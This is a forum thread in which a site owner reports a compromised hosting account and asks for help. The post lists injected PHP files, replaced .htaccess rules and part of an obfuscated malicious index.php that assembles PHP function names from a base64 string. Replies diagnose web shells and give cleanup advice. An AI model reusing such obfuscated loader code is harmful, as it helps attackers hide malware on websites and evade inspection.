Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Взломали сайт или вредоносное ПО?


pininpro

Recommended Posts

Добрый день. На днях все 2 сайта на хостинге начали себя странно вести. Один стоит на ОС 2.3, второй на 3.0.3.2. Так вот на первом перестало входить по прямому пути в админку, а второй при загрузке главной просто белая простынь ... Без какого-либо кода. Начал разбираться и нашел на фтп в корневых папках вот такие вот файлы:

 

kgdstsir.php

wp-index.php

skgoalssf.php

 

Внутри просто какой-то код непонятный.

 

Также были автоматом заменены файлы index.php (внутри абракадабра шифрами) и .htaccess.

 

В файле .htaccess внутри код:

 

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule> 

 

При том .htaccess насоздавался абсолютно в каждой папке в корневой директории, куда не зайди внутри есть .htaccess с этим же кодом.

 

index.php имеет следующее содержимое:

 

<?php
$C6__CC_6C6='2002';
$C6_CCC6__6=base64_decode("ZHBjX2hrMjNuMHU2OG9neXZtOWJqZnExcjRpYWV6cy01bHR4dzc=");$C_C__66C6C=$C6_CCC6__6{26}.$C6_CCC6__6{14}.$C6_CCC6__6{8}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{10}.$C6_CCC6__6{30}.$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{27}.$C6_CCC6__6{19}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34};$CC_6_6_C6C=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{1}.$C6_CCC6__6{10}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CCC__66_C6=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{14}.$C6_CCC6__6{28}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$C_C6_CC66_=$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{3}.$C6_CCC6__6{28}.$C6_CCC6__6{35}.$C6_CCC6__6{26}.$C6_CCC6__6{30}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CC6_6_C6_C=$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{24}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{1}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{8}.$C6_CCC6__6{14};$C__C6C6_C6=$C6_CCC6__6{2}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{27}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CC

 

 

Также в корневом каталоге добавились папки:

 

wp-admin

 

внутри

image.png.fc5a7ea3d4463604c5fe2c80f9cbef64.png

 

При этом сайт то работает, то нет. Сторонних модулей не ставил. С нечего такое началось. Что делать? Как это решить? При удалении этих файлов и папок обновляешь фтп и они снова тут же появляются. Откуда подгружаются - не понятно. Впервые такое.

 

image.png

Надіслати
Поділитися на інших сайтах


это надо на хостинге сбросить процессы и очистить файлы и причину их появления

 

могу сделать недорого и квалифицированно

Надіслати
Поділитися на інших сайтах

Взломали вас. И по полной разгулялись, все загадили. Восстанавливать из бэкапа с тотальной чисткой предварительной, менять на все пароли.

38 минут назад, pininpro сказал:

При удалении этих файлов и папок обновляешь фтп и они снова тут же появляются.

В других файлах у вас шелл(ы) и скрипт(ы), который эти файлы подгружает. А где-нибудь на вашем сервере по неожиданному для вас адресу открываются посадочные какой-нибудь фармы. 

Надіслати
Поділитися на інших сайтах


Переименовал корневую папку сайта, а вместо нее создал такую же, но пустую. В итоге в новой пустой папке образовались эти все файлы (которые докачиваются автоматом), а в старой (с сайтом) полностью пропали сторонние файлы и даже htaccess, которые были по всем папкам. Выходит скрипт или исполняемый файл где-то в основе хостинга зарыт. Из последних изменений (судя по датам) это папки: mail и tmp

 

В логах нет следов того, что кто-то подключался за этот период.

Змінено користувачем pininpro
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.